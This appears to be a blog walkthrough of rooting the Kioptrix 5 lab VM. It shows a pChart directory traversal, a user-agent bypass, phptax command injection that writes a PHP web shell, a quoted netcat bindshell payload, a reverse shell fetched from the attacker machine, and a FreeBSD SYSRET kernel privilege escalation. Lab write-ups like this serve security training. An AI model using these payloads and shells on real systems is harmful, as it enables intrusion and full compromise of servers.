Rooting Kioptrix 5 Walkthrough

Overview

Kioptrix 5 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Vulnerabilities Exploited:

  • Local File Inclusion
  • Remote Command Execution phptax application
  • FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix Final in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Reconnaissance/Scanning

#netdiscover

root@kali:~# netdiscover

 Currently scanning: 192.168.14.0/16   |   Screen View: Unique Hosts                                                               
                                                                                                                                 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                    
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname     
 -----------------------------------------------------------------------------
 192.168.8.103   00:0c:29:75:b1:92      1      60  VMware, Inc.   

Target VM IP Address: 192.168.8.103

Scanning with nmap

root@kali:~# nmap -p- -A 192.168.8.103
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 23:27 EDT
Nmap scan report for 192.168.8.109
Host is up (0.00059s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
MAC Address: 00:0C:29:75:B1:92 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.8.103
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.26 seconds
 

Lets explore services in opened ports. I found webserver is runing on port 8080, and resources are forbidden. We dont have access to this server.

Moving forward, default page is visible for website on port 80.

Viewing page source give us hint as comment to pChart version 2.1.3 application.

Here is our pChart application.

Exploitation

Lets search for exploits in exploitdb for pChart application.

 

root@kali:~# searchsploit pChart 2.1.3
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title                                                                              |  Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                     | exploits/php/webapps/31173.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

So, there is directory traversal vulnerability, that allow us to read arbitrary files from server.

Next, part of story is, we are forbidden to access any resource on port 8080, and that configuration is stored in httpd.conf of web-server. So, lets read httpd.conf and see what configuration is done in httpd.conf, and what we can do to bypass that restriction.

As, we can see, all browsers are allowed access to server that start with ^Mozilla/4.0.

So, i overrided user agent string in firefox to Mozilla/4.0.

New String created is general.useragent.override with value Mozilla/4.0

 

 

Access to server is granted.

Now, we found phptax application. Lets search for exploits. And, guess what, we found Remote Command Execution Vulnerability, we can execute arbitrary commands on server.

root@kali:~# searchsploit phptax
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title                                                                              |  Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                              | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                           | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                          | exploits/php/webapps/21665.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Lets read through exploit code.

root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/21665.txt
-----------------------------------------------------
phptax 0.8 <= Remote Code Execution Vulnerability
-----------------------------------------------------
 
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>
 
Vendor information:
 
"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.
The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."
 
Vendor URI: http://sourceforge.net/projects/phptax/
 
----------------------------------------------------
 
Risk-level: High
 
The application is prone to a remote code execution vulnerability.
 
----------------------------------------------------
 
drawimage.php, line 63:
 
include ("./files/$_GET[pfilez]");
 
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
 
----------------------------------------------------
 
Exploit / Proof of Concept:
 
Bindshell on port 23235 using netcat:
 
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
 
** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
 
----------------------------------------------------
 
Solution:
 
Do some input validation.
 
----------------------------------------------------
root@kali:~#

We want to execute this command on server shell.

echo “<?php system(\$_GET[‘cmd’]); ?>” > shell.php

this command will create a simple php shell that can execute commands.

http://192.168.8.103:8080/phptax/drawimage.php?pfilez=xxx;%20echo%20%22%3C%3Fphp%20system($_GET%5B%27cmd%27%5D);%20%3F%3E%22%20%3E%20shell.php&pdf=make

Our shell is uploaded at http://192.168.8.102:8080/phptax/shell.php and we can execute commands. Lets find whether wget, nc is installed on server.

nc is installed.

Lets use nc to get interactive shell. we will upload pentestmonkey’s php netcat shell.

root@kali:~# nc -nvlp 1234 < /var/www/html/shell.txt

listening on [any] 1234 ...

On server, we will upload php shell using this command.

nc 192.168.8.102 1234 > rshell.php

http://192.168.8.103:8080/phptax/shell.php?cmd=nc%20192.168.8.102%201234%20%3E%20rshell.php

So, our rshell.php is uploaded, lets access this rshell.php in browser and receive reverse connect netcat shell.

Privilege Escalation

$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

 

https://www.exploit-db.com/exploits/28718/

On kali linux: #nc -nvlp 12345 < exploit.c

I transferred this c shell to server using nc. Compiled, executed, and rooted machine!

$ nc 192.168.8.102 12345 > /tmp/exploit.c
$ cd /tmp
$ gcc -o exploit exploit.c
$ ./exploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

References

https://www.vulnhub.com/entry/kioptrix-2014-5,62/

https://www.exploit-db.com/exploits/28718/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s